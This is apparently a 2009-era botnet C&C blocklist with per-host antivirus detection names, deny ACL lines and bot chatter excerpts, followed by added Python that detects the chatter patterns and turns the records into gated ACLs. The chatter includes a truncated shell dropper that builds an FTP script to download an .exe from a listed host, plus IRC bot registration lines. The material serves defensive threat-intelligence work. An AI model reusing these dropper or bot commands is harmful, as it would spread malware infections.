BitDefender: Virtob.8.Gen
CAT-QuickHeal: Virut.Z
ClamAV: Virut-54
DrWeb: Virut.30
eSafe: MISSED
eTrust-Vet: Virut.7115
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Virut.AV
F-Prot: Virut.7116
F-Secure: Virut.av
Ikarus: Kolabc
Kaspersky: Virut.av
McAfee: Virut.gen.a
Microsoft: Virut.AC
NOD32v2: MISSED
Norman: Virut.AG
Panda: Virutas.FG
Prevx1: MISSED
Rising: Virut.an
Sophos: Virut-W
Sunbelt: MISSED
Symantec: Virut.W
TheHacker: Virut.av
TrendMicro: PE_VIRUT.AV
VBA32: Virut.2
VirusBuster: Virut.Gen.4
Webwasher-Gateway: MISSED

Priority: 1
TCP Ports: 80 216
Filter: deny ip host 97.74.144.31 any log ! 1 infects 10/14/09 to 10/14/09 jws.com
ISP: godaddy.com inc
Clients: 1
Country: united states
Activity Domain: jws.com
Chatter Example
  • Server: echo off&echo open 91.66.198.112 1023>>cmd.ftp&echo...
  • Client: USER anonymous
  • Client: PASS bin
  • Server: RETR 12394_upload.exe
  • Client: GET /images/logos.gif?51dff=2347513 HTTP/1.0User-Agent: KUKU...
  • Server: GET /result?52552 HTTP/1.0User-Agent: Opera/9.00 (Windows NT 5.1;...
  • Server: GET /h2/mainh.gif?528fb=338171 HTTP/1.0User-Agent: KUKU v5.06exp...
  • Server: GET /images/logos.gif?531c5=680842 HTTP/1.0User-Agent: KUKU...
  • Server: GET /?342546 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
  • Server: GET /h2/?s=938 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
  • Server: GET / HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...
  • Server: GET /home_imag/mainf.gif?53e68=1718280 HTTP/1.0User-Agent: KUKU...
  • Server: GET /logos.gif?53fee=2752368 HTTP/1.0User-Agent: KUKU v5.06exp...
  • Server: GET /images/logos.gif?54bf5=1041375 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/mainf.gif?54df8=1738200 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/logos.gif?54ea4=3478120 HTTP/1.0User-Agent: KUKU...
  • Server: GET /images/logos.gif?55aaa=2105340 HTTP/1.0User-Agent: KUKU...
  • Server: GET /utest/?jutr=31444&oo=2&57835=264973&ra=0 HTTP/1.0User-Agent:...
  • Server: GET /test/gewtghywa.dat HTTP/1.0X-Forwarded-For:...

BotClient Antivirus Diagnoses
AhnLab-V3: Kashu.B
AntiVir: Sality.Y
Authentium: Sasser.E
Avast: _Sality
AVG: I-Sasser.E
BitDefender: Generic.24440
CAT-QuickHeal: Sality.R
ClamAV: Sasser.H
DrWeb: Sector.5
eSafe: MISSED
eTrust-Vet: Sality.AA
Ewido: MISSED
FileAdvisor: MISSED
Fortinet: Sality.AA
F-Prot: Sasser.E
F-Secure: Sasser.D
Ikarus: Email-Plexus.E
Kaspersky: Sality.aa
McAfee: Sality.gen
Microsoft: Sality.AM
NOD32v2: MISSED
Norman: Sasser.E
Panda: Sasser.E.worm
Prevx1: MISSED
Rising: KUKU.GEN
Sophos: Sality-AM
Sunbelt: MISSED
Symantec: Sality.AE
TheHacker: Sality.gen
TrendMicro: PE_SALITY.EN
VBA32: Sality.kaka
VirusBuster: Sasser.E
Webwasher-Gateway: MISSED
Priority 1
TCP Ports 80
Filter deny ip host 194.67.57.20 any log
Infects 1 (09/03/09 to 09/03/09)
Domain mail.ru
ISP sovintel-msk-netbridge-ervices-net
Clients 1 (russian federation)
Activity Domain mail.ru
Chatter Example
  • Client: GET /lsd HTTP/1.0User-Agent: bHost: 66.220.226.83:50929
  • Server: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...

BotClient Antivirus Diagnoses
Vendor             Detection
AhnLab-V3          MISSED
AntiVir            TRDropper.Gen
Authentium         Heuristic-MUP!Eldorado
Avast              _Padobot-D@UPX
AVG                MISSED
BitDefender        Generic.69904
CAT-QuickHeal      MISSED
ClamAV             MISSED
DrWeb              MISSED
eSafe              WormPoxdar.A.D
eTrust-Vet         MISSED
Ewido              MISSED
FileAdvisor        MISSED
Fortinet           MISSED
F-Prot             Heuristic-MUP!Eldorado
F-Secure           MISSED
Ikarus             MISSED
Kaspersky          MISSED
McAfee             MISSED
Microsoft          Poxdar.A
NOD32v2            MISSED
Norman             MISSED
Panda              MISSED
Prevx1             MISSED
Rising             MISSED
Sophos             MalHckPk-E
Sunbelt            MISSED
Symantec           Poxdar
TheHacker          MISSED
TrendMicro         PAK_Generic.001
VBA32              MISSED
VirusBuster        MISSED
Webwasher Gateway  MISSED
Priority 1
TCP Ports 3305
Filter deny ip host 203.146.251.62 any log
Infects 1 (11/03/09 to 11/03/09)
Domain csloxinfo.net
ISP reassign to paidc idc suapha-idc customer
Clients 1 (thailand)
Activity Domain csloxinfo.net
Chatter Example
  • Client: PASS secretpass
  • Client: NICK P|ot4z09bbzUSER lnv4ddgy3 * 0 :USA|XP|651
  • Server: :hub.62014.net 001 P|ot4z09bbz...
  • Client: USERHOST P|ot4z09bbz
  • Server: :hub.62014.net 302 P|ot4z09bbz...
  • Client: USERHOST P|ot4z09bbzMODE P|ot4z09bbz JOIN #mm RSA
  • Client: PRIVMSG #mm...
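The chatter shown on this page is the part of a session a sensor can actually match: in the jws.com record, a shell fragment that writes an FTP script file ("echo open HOST PORT>>cmd.ftp"), an anonymous FTP login followed by RETR of an .exe, and HTTP requests carrying the non-browser User-Agent "KUKU"; in this record, an IRC registration whose realname is an OS/country tag (USA|XP|651) followed by a JOIN to #mm. The Python below is an added example, not part of this list or any tooling of its maintainers. It runs a handful of rules over sessions reconstructed from the chatter lines above (kept truncated where the page truncates them, and ignoring the page's Client:/Server: labels, which put the RETR on the server side) plus one constructed benign session. The rule names, the "KUKU" User-Agent check and the tag regex are my assumptions drawn from these samples, not signatures published with the list.

```python
"""Rule matcher for the C2 chatter shapes shown in this list.

Added example: the sample sessions are built from the page's Chatter
Example lines (truncations kept as '...'); BENIGN_SESSION is constructed.
Rule names and patterns are assumptions drawn from those samples.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str     # short name of the matched behaviour
    detail: str   # extracted value (host:port, file, channel, tag, ...)
    line: str     # the chatter line that triggered it


# Shell fragment that builds an FTP script file: 'echo open HOST PORT>>cmd.ftp'
FTP_SCRIPT = re.compile(
    r"echo open (?P<host>\d{1,3}(?:\.\d{1,3}){3}) (?P<port>\d{1,5})"
    r"\s*>>\s*(?P<file>[^\s&]+\.ftp)", re.I)
# Anonymous FTP login, then retrieval of an executable name
FTP_ANON = re.compile(r"^USER anonymous\b", re.I)
FTP_RETR_EXE = re.compile(r"^RETR (?P<name>\S+\.(?:exe|dll|scr))\b", re.I)
# The non-browser User-Agent used by the HTTP beacons in the jws.com chatter
UA_KUKU = re.compile(r"User-Agent:\s*(?P<ua>KUKU\S*)", re.I)
# IRC registration whose realname is an OS/country tag like 'USA|XP|651'
IRC_NICK = re.compile(r"^NICK \S+")
IRC_USER_TAG = re.compile(r"USER \S+ \S+ \S+ :(?P<tag>[A-Z]{2,3}\|[A-Za-z0-9]+\|\d+)")
IRC_JOIN = re.compile(r"JOIN (?P<chan>#\S+)")


def split_direction(line):
    """Return (direction, payload) for a 'Client: ...' / 'Server: ...' line."""
    direction, sep, payload = line.partition(": ")
    if sep and direction in ("Client", "Server"):
        return direction, payload
    return "", line


def inspect_session(lines):
    """Run every rule over one reconstructed session; findings come back in line order.
    Two rules are stateful: RETR only counts after a dropper script was seen, and
    JOIN only counts after an IRC NICK, so a lone file fetch or chat join is not flagged."""
    findings = []
    saw_ftp_script = False
    saw_irc_registration = False
    for raw in lines:
        _, payload = split_direction(raw)   # direction labels are not trusted
        m = FTP_SCRIPT.search(payload)
        if m:
            saw_ftp_script = True
            findings.append(Finding("ftp_dropper_script",
                                    f"{m['host']}:{m['port']} -> {m['file']}", raw))
        if FTP_ANON.search(payload):
            findings.append(Finding("ftp_anonymous_login", "anonymous", raw))
        m = FTP_RETR_EXE.search(payload)
        if m and saw_ftp_script:
            findings.append(Finding("ftp_retr_executable", m["name"], raw))
        m = UA_KUKU.search(payload)
        if m:
            findings.append(Finding("http_ua_kuku", m["ua"], raw))
        if IRC_NICK.search(payload):
            saw_irc_registration = True
            m = IRC_USER_TAG.search(payload)
            if m:
                findings.append(Finding("irc_bot_tag", m["tag"], raw))
        m = IRC_JOIN.search(payload)
        if m and saw_irc_registration:
            findings.append(Finding("irc_join", m["chan"], raw))
    return findings


def triggered_rules(lines):
    """Sorted set of rule names that fired for a session."""
    return sorted({f.rule for f in inspect_session(lines)})


# Sessions reconstructed from the page's chatter (jws.com and csloxinfo.net records).
DROPPER_SESSION = [
    "Server: echo off&echo open 91.66.198.112 1023>>cmd.ftp&echo...",
    "Client: USER anonymous",
    "Client: PASS bin",
    "Server: RETR 12394_upload.exe",
    "Client: GET /images/logos.gif?51dff=2347513 HTTP/1.0User-Agent: KUKU...",
    "Server: GET /?342546 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...",
    "Server: GET /logos.gif?53fee=2752368 HTTP/1.0User-Agent: KUKU v5.06exp...",
]
IRC_SESSION = [
    "Client: PASS secretpass",
    "Client: NICK P|ot4z09bbzUSER lnv4ddgy3 * 0 :USA|XP|651",
    "Server: :hub.62014.net 001 P|ot4z09bbz...",
    "Client: USERHOST P|ot4z09bbz",
    "Client: USERHOST P|ot4z09bbzMODE P|ot4z09bbz JOIN #mm RSA",
    "Client: PRIVMSG #mm...",
]
# Constructed control: an ordinary browser request, nothing should fire.
BENIGN_SESSION = [
    "Client: GET / HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...",
    "Server: HTTP/1.0 200 OK",
]

if __name__ == "__main__":
    for name, sess in [("dropper", DROPPER_SESSION), ("irc", IRC_SESSION), ("benign", BENIGN_SESSION)]:
        print(name, [(f.rule, f.detail) for f in inspect_session(sess)])
```

The stateful rules are the point: an anonymous FTP fetch of an .exe or a JOIN on its own is common enough to be noise, but either one preceded in the same session by the dropper script or a tagged registration is the sequence these chatter samples show.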

BotClient Antivirus Diagnoses
Vendor             Detection
AhnLab-V3          MISSED
AntiVir            TRDropper.Gen
Authentium         Threat-HLLIYE!Eldorado
Avast              _DCom-F
AVG                Heur
BitDefender        Packer.Yoda.A
CAT-QuickHeal      MISSED
ClamAV             MISSED
DrWeb              HLLW.Piabot.4
eSafe              MISSED
eTrust-Vet         MISSED
Ewido              MISSED
FileAdvisor        MISSED
Fortinet           MISSED
F-Prot             Threat-HLLIYE!Eldorado
F-Secure           MISSED
Ikarus             Exploit.MS06040
Kaspersky          Heur.Generic
McAfee             MISSED
Microsoft          Exploit_MS06040.gen
NOD32v2            MISSED
Norman             MISSED
Panda              TrjCI.A
Prevx1             MISSED
Rising             MISSED
Sophos             MalPacker
Sunbelt            MISSED
Symantec           MISSED
TheHacker          MISSED
TrendMicro         PAK_Generic.001
VBA32              MISSED
VirusBuster        PackedYoda
Webwasher Gateway  MISSED
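Every record in this section carries the same fields: priority, observed TCP ports, the Cisco-style ACL entry, the infection count with first and last sighting, the host's domain and its ISP. All three hosts here are Priority 1 with a single sighting, and two of the records point at shared provider space (the jws.com host is listed under godaddy.com inc, and 194.67.57.20 under mail.ru), so pasting the deny lines straight into a border ACL months later blocks on thin, stale evidence. The Python below is an added example, not the list's own download format or tooling: it parses the record lines as they appear in the run-on form above into fields and renders ACL text with a deployment gate on sighting count and age. The gate thresholds and the review date passed in are my assumptions; the host, port, date and ISP values are copied from the three records in this section.

```python
"""Parse this list's 'Filter' record lines and render gated Cisco-style ACL text.

Added example. RECORDS holds the three record lines of this section verbatim;
the gate thresholds and the as_of date used below are assumptions, not the
list's own policy.
"""
import re
from datetime import datetime

RECORDS = [
    "Priority 1 TCP Ports 80 216 Filter deny ip host 97.74.144.31 any log ! 1 infects 10/14/09 to 10/14/09 jws.com ISP godaddy.com inc",
    "Priority 1 TCP Ports 80 Filter deny ip host 194.67.57.20 any log ! 1 infects 09/03/09 to 09/03/09 mail.ru ISP sovintel-msk-netbridge-ervices-net",
    "Priority 1 TCP Ports 3305 Filter deny ip host 203.146.251.62 any log ! 1 infects 11/03/09 to 11/03/09 csloxinfo.net ISP reassign to paidc idc suapha-idc customer",
]

# One record per line; the '!' separates the ACL entry from the sighting comment.
RECORD_RE = re.compile(
    r"^Priority (?P<priority>\d+) TCP Ports (?P<ports>(?:\d+ )+)"
    r"Filter (?P<acl>deny ip host (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) any log) ! "
    r"(?P<infects>\d+) infects (?P<first>\d\d/\d\d/\d\d) to (?P<last>\d\d/\d\d/\d\d) "
    r"(?P<domain>\S+) ISP (?P<isp>.+)$")


def mdy(s):
    """Parse the list's mm/dd/yy dates (two-digit year) to a date."""
    return datetime.strptime(s, "%m/%d/%y").date()


def parse_record(line):
    """Split one record line into typed fields; raise on anything unrecognised."""
    m = RECORD_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised record: {line!r}")
    d = m.groupdict()
    return {
        "priority": int(d["priority"]),
        "ports": [int(p) for p in d["ports"].split()],
        "ip": d["ip"],
        "acl": d["acl"],
        "infects": int(d["infects"]),
        "first": mdy(d["first"]),
        "last": mdy(d["last"]),
        "domain": d["domain"],
        "isp": d["isp"].strip(),
    }


def passes_gate(rec, as_of, min_infects=2, max_age_days=90):
    """Deployment gate (assumed policy): enough sightings, and the last one recent."""
    return rec["infects"] >= min_infects and (as_of - rec["last"]).days <= max_age_days


def to_acl(lines, as_of, **gate):
    """Render a named extended ACL body. as_of may be a date or an mm/dd/yy string.
    Records that fail the gate are kept as 'remark' lines so the review trail
    survives without blocking any traffic."""
    as_of = mdy(as_of) if isinstance(as_of, str) else as_of
    out = []
    for rec in map(parse_record, lines):
        note = (f"{rec['domain']} / {rec['isp']}: {rec['infects']} infects "
                f"{rec['first']:%Y-%m-%d}..{rec['last']:%Y-%m-%d}, priority {rec['priority']}, "
                f"tcp ports {' '.join(map(str, rec['ports']))}")
        if passes_gate(rec, as_of, **gate):
            out.append(f" remark {note}")
            out.append(f" {rec['acl']}")
        else:
            out.append(f" remark SKIPPED (below gate) {note}")
    return out


if __name__ == "__main__":
    # Assumed review date; with the default gate every single-sighting host stays a remark.
    print("\n".join(to_acl(RECORDS, "11/30/09", min_infects=1, max_age_days=30)))
```

With the default gate (two sightings, 90 days) none of the three hosts becomes a deny entry; loosening it to one sighting within 30 days of an assumed 11/30/09 review date admits only the csloxinfo.net host, whose single sighting is the most recent.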